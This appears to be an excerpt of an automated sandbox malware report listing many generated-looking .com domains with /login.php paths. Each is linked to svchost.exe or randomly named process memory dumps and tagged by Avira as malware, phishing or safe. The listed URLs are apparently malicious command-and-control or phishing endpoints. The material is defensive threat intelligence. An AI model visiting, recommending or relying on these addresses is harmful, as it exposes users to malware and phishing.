                                                                                                                                                                                                            http://gatykyh.com/login.phpsvchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pupycuv.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetykyq.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vofypam.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetynev.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyniw.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008F91000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pupywyv.com/login.phpsvchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygyxux.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3406954551.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzybil.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volygoc.com/svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvynid.com/login.phpsvchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojybim.com/login.phpsvchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadydow.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376391418.000000000331E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376466077.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375586174.000000000332D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379454788.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375980019.0000000003321000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377198818.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376798591.0000000003325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.google.comtQ2svchost.exe, 00000002.00000003.2314820342.0000000009323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqyxyp.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyxar.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxygax.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopykum.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygyjuj.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337019540.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330643505.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumyjip.com/login.phpsvchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://ganyfuz.com/login.phpEsvchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahydyb.com/svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pupygel.com/svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puvygyv.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388806823.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://purymog.com/http://qegylul.com/http://lyryman.com/Psvchost.exe, 00000002.00000003.2359792353.000000000924A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360483972.000000000924A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyfyj.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.0000000009104000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386712444.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387387248.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D72000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2697302039.000000000899E000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://volyquk.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
